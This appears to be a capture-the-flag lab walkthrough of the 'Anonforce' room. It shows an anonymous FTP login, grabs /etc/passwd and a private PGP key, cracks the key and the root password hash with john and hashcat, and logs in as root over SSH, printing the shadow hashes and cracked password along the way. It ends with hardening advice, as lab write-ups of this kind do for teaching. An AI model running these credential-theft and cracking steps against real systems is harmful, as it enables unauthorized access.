Home THMTry Hack Me HTBHack The Box

Anonforce

URL:

https://www.tryhackme.com/room/anonymous


Description:

Anonforce is an easy level room on Try Hack Me that focuses on FTP Servers, decrypting hashes, decrypting and importing GPG/PGP keys.


Enumeration:

We start with a Rustscan[1] to quickly find any available ports, with an Nmap report on the service versions found on the discovered ports.

sudo rustscan -a 10.10.52.22 -- -sV -sS -oN anonymous_nmap.txt

The above scan is referencing the IP address to be scanned (10.10.52.22) and calling for the following parameters from Nmap[2]:

Nmap Commands Overview:
-sV = Checks to see what the version is of the service running on the scanned ports.
-sS = Type of scan (SYN Scan) being used. Considered a slower and and more silent scan. However, due to me running this with rustscan (which is a loud scanner) there is no real advantage doing this. I am just use to it.
-oN = Saving the output to a text file I have named. This is so I can review the results later if necessary.

Results:

# Nmap 7.91 scan initiated Wed Aug 25 22:11:53 2021 as: nmap -vvv -p 22,21 -sV -sS -oN anonforce_nmap.txt 10.10.52.22
Nmap scan report for 10.10.52.22
Host is up, received timestamp-reply ttl 61 (0.27s latency).
Scanned at 2021-08-25 22:11:53 EDT for 2s

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

We have found the machine has an FTP server and has SSH enabled. First thing first, lets check to see if 'anonymous' is enabled on the FTP server. Judging by the name of this room, there is a safebet anonymous should work

ftp 10.10.52.22.
Connected to 10.10.52.22.
220 (vsFTPd 3.0.3)
Name (10.10.52.22.:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

We have access to the FTP server. Looking at the contents:

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Aug 11 2019 bin
drwxr-xr-x 3 0 0 4096 Aug 11 2019 boot
drwxr-xr-x 17 0 0 3700 Aug 25 19:08 dev
drwxr-xr-x 85 0 0 4096 Aug 13 2019 etc
drwxr-xr-x 3 0 0 4096 Aug 11 2019 home
lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x 19 0 0 4096 Aug 11 2019 lib
drwxr-xr-x 19 0 0 4096 Aug 11 2019 lib64
drwx------ 2 0 0 4096 Aug 11 2019 lost+found
drwxr-xr-x 4 0 0 4096 Aug 11 2019 media
drwxr-xr-x 2 0 0 4096 Feb 26 2019 mnt
drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 notread
drwxr-xr-x 2 0 0 4096 Aug 11 2019 opt
drwxr-xr-x 99 0 0 0 Aug 25 19:08 proc
drwx------ 3 0 0 4096 Aug 11 2019 root
drwxr-xr-x 18 0 0 540 Aug 25 19:08 run
drwxr-xr-x 2 0 0 12288 Aug 11 2019 sbin
drwxr-xr-x 3 0 0 4096 Aug 11 2019 srv
dr-xr-xr-x 13 0 0 0 Aug 25 19:08 sys
drwxrwxrwx 9 0 0 4096 Aug 25 19:08 tmp
drwxr-xr-x 10 0 0 4096 Aug 11 2019 usr
drwxr-xr-x 11 0 0 4096 Aug 11 2019 var
lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic
lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz.old -> boot/vmlinuz-4.4.0-142-generic

We have access to what appears to be the systems current file directory. We should check to see if we can download '/etc/passwd' for any information:

ftp> cd /etc/
250 Directory successfully changed.
ftp> get passwd
local: passwd remote: passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (1524 bytes).
226 Transfer complete.
1524 bytes received in 0.00 secs (17.0988 MB/s)

Success, tho we don't see anything overly useful within the file other than the username 'melodias'. I tried to see if I can download '/etc/shadw' but it appears 'anonymous' does not have the access to get this file. I was, however, able to grab the user flag. As we have access to the live machine via FTP we have technically compromised the machine?

ftp> cd /home/melodias
250 Directory successfully changed.


Resources:

[1]https://rustscan.github.io/RustScan/
[2]https://nmap.org/book/man.html


Compromise:

As we have access to the machine and we can view the users 'home' directory, we can grab the flag.

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 4 1000 1000 4096 Aug 11 2019 .
drwxr-xr-x 3 0 0 4096 Aug 11 2019 ..
-rw------- 1 0 0 117 Aug 11 2019 .bash_history
-rw-r--r-- 1 1000 1000 220 Aug 11 2019 .bash_logout
-rw-r--r-- 1 1000 1000 3771 Aug 11 2019 .bashrc
drwx------ 2 1000 1000 4096 Aug 11 2019 .cache
drwxrwxr-x 2 1000 1000 4096 Aug 11 2019 .nano
-rw-r--r-- 1 1000 1000 655 Aug 11 2019 .profile
-rw-r--r-- 1 1000 1000 0 Aug 11 2019 .sudo_as_admin_successful
-rw-r--r-- 1 0 0 183 Aug 11 2019 .wget-hsts
-rw-rw-r-- 1 1000 1000 33 Aug 11 2019 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for user.txt (33 bytes).
226 Transfer complete.
33 bytes received in 0.00 secs (98.5522 kB/s)


cat user.txt
REDACTED


Privilege escalation:

Looking at the systems file directories, I notice 1 directory that is not normally on Ubuntu systems:

drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 notread

Lets look inside this directory and see if there is anything of interest inside:


ftp> cd notread
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 .
drwxr-xr-x 23 0 0 4096 Aug 11 2019 ..
-rwxrwxrwx 1 1000 1000 524 Aug 11 2019 backup.pgp
-rwxrwxrwx 1 1000 1000 3762 Aug 11 2019 private.asc
226 Directory send OK.

We have a PGP and an ASC file. Lets download these both to our machine and review the contents and discuss what an ASC and PGP file is:

ftp> get backup.pgp
local: backup.pgp remote: backup.pgp
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.pgp (524 bytes).
226 Transfer complete.
524 bytes received in 0.00 secs (495.3715 kB/s)
ftp> get private.asc
local: private.asc remote: private.asc
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for private.asc (3762 bytes).
226 Transfer complete.
3762 bytes received in 0.00 secs (2.6694 MB/s)

First things first, what even is a PGP file and what do we do with it?


Well a PGP (Pretty Good Privacy), also known as GPG, is a type of encryption used for signing messages or data. It uses a system of "public" or "private" keys to do this[3]. The use of the word key here does not mean a physical item, just to be clear. This is just a piece of information used to help transform any plaintext data into a ciphertext, or to decrypt a ciphertext into plaintext. So, what is a public key and a private key, and what are the differences?

A private key is the first half of a GPG key and should be kept a secret. The reason for this is the first half of the message is encrypted using this key and it is used to decrypt any messages sent or recieved using the same publicly shared GPG key. It is also used to sign the message to prove that you own the key.

A public key is the second half of the GPG key and it can be made public knowledge if you so please. This is only used to encrypt messages or data for the owner of that private key. It is entirley useless at decrypting so knowledge of this key means really nothing. But how does this tie in with the ASC file we also retrieved?

Well that ASC file is the key. We need to import that file and we can then use that key to decrypt the backup.pgp file so we can see what the contents are. Only problem is, we don't know the passphrase for the key meaning we can not use it to decrypt the PGP file. As we have the private key, we can try decrypting it and see if we can guess the password using a wordlist. To do this we now need to meet my friend 'john'.

John The Ripper[4] is a bruteforcing tool used to crack a variety of different encryption on operating systems. The tool itself is very broad and will be used on multiple rooms throughout my website, the only portion we will be using it for in this one is the ASC key[5]. First action is converting the ASC into a hash file using john:

gpg2john private.asc > private.hash

Next we need to use 'john' to bruteforce the hash against a wordlist. The most common wordlist used in these practice rooms is the 'rockyou.txt'. Due to this, we will use this list and not a standard seclist you can get on the Kali machine:

john -wordlist=/usr/share/wordlists/rockyou.txt private.hash
1 тип Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xbox360 (anonforce)
1g 0:00:00:00 DONE (2021-08-25 22:21) 14.28g/s 13314p/s 13314c/s 13314C/s xbox360..madalina
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Success! We have the passphrase to the private key, we now just need to import it using gpg.

gpg --import private.asc

Using the password we have cracked, we can input it into the authentication section so it will import the key correctly:

pgp_key
gpg: /home/kali/.gnupg/trustdb.gpg: trustdb created
gpg: key B92CD1F280AD82C2: public key "anonforce " imported
gpg: key B92CD1F280AD82C2: secret key imported
gpg: key B92CD1F280AD82C2: "anonforce " not changed
gpg: Total number processed: 2
gpg: imported: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1

Now we need to decrypt backup.pgp:

gpg --decrypt backup.pgp

Input the same password as before:

decrypt_backup
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 512-bit ELG key, ID AA6268D1E6612967, created 2019-08-12
"anonforce "
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18120:0:99999:7:::
uuidd:*:18120:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
sshd:*:18120:0:99999:7:::
ftp:*:18120:0:99999:7:::

We have a backup of 'passwd' but it is showing 2 users with passwords. With this information we can try to bruteforce 'root' and see if we can SSH with those credentials. But how do we do that? Now it is time to introduce 'hashcat'.

Hashcat[6] is another bruteforcing tool used on hashes to try to decode what the users password might be. This tool does use GPU as its processing power, so it is essential to have a decentish graphics card to help speed up the process of decoding. The way this tool works is we need to feed it a wordlist. Once it has this wordlist, it will then encode each word within that list against the hash we set within it and match to see if the values are equal. If this doesn't make sense, don't worry we will be going into detail on what parameters I run along with what it is doing in the backend.
First thing first, we need to put this hash into its own file so hashcat can attempt to decode it:

echo $6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0 > root_password.hash

Wait a second, did you notice a mistake just then? Lets verify if that worked properly:

cat root_password.hash
(this is blank space, it just not be easy to express this without saying it : /)

Why didn't that work? Well it is due to the '$'. Bash uses '$' for a variety of different reasons and with different patterns for it. An example is $?. This is used to look at the last executed binary/command on the system. This is also used with $1 as an example. So to counter this we need to use '\' when inputting any special character with bash:

echo \$6\$07nYFaYf\$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0 > root_password.hash
cat root_password.hash
$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0

Having verified that we have saved the hash correctly using echo, we can now try decoding it using hashcat:

hashcat -m 1800 root_password.hash /usr/share/wordlists/rockyou.txt

...

$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:hikari

Username:Password

root:hikari

What just happened you may be asking. Well we just used hashcat to encode each word in the specified wordlist and compare it against the hash in our saved file. A greater breakdown on this information:

Hashcat Commands Overview:
-m = this specifies the encoding of the specific hash. As this is '$6$' from the file '/etc/shadw', we can assume it is sha512crypt[7]
1800 = the hash command specifing sha512crypt
root_password.hash = the file we the saved hash to compare against
/usr/share/wordlists/rockyou.txt = the wordlist used to bruteforce the password. What this is doing is using '-m 1800' to encode each individual word in this list, and compare it to 'root_password.hash'. Once it has a match it outputs the word

With all of that, we can now log into the machine via SSH and retrieve the root flag:

ssh root@10.10.52.22
root@10.10.52.22's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-157-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@ubuntu:~# cat /root/root.txt
REDACTED


Resources:

[3]https://www.privex.io/articles/what-is-gpg
[4]https://github.com/openwall/john
[5]https://www.openwall.com/lists/john-users/2015/11/17/1
[6]https://hashcat.net/wiki/
[7]https://hashcat.net/wiki/doku.php?id=example_hashes


Hardening:

To prevent his machine from being compromised in future the following changes should be made on the device and services:
  1. Remove full access for 'anonymous' to the FTP server. Limit anonymous to a small folder that would not allow them access to the entire machine.
  2. Remove the backups in the '/notread' directory, or just change the access level to ensure there a minimal level of security.
  3. Enforce harder, longer passwords on the PGP key. Wordlist bruteforce will always exist, but the more complex and unique the password is the less likely it will be compromised
  4. Enforce harder, longer passwords for root. Once again, wordlist bruteforce will always exist. We could of used 'hydra' to bruteforce into the machine if we had tried. Make the password complex and unique for security.
  5. Remove root's access to SSH. This will eliminate any problem with attackers compromising the system using the super user account, giving them total control of the machine.


Conclusion:

I know this one seemed like a long room, but it really isn't. I go into a little depth on a few things which adds to the reading. If I didn't this page would be a 3 minute read. Hopefully you have walked away knowing that PGP/GPG exist, they are secure (with a strong password) and useful with encrypting data. You also understand john the ripper and hashcat and the basic function of how to use it to bruteforce passwords. Thank you for reading through my walkthrough.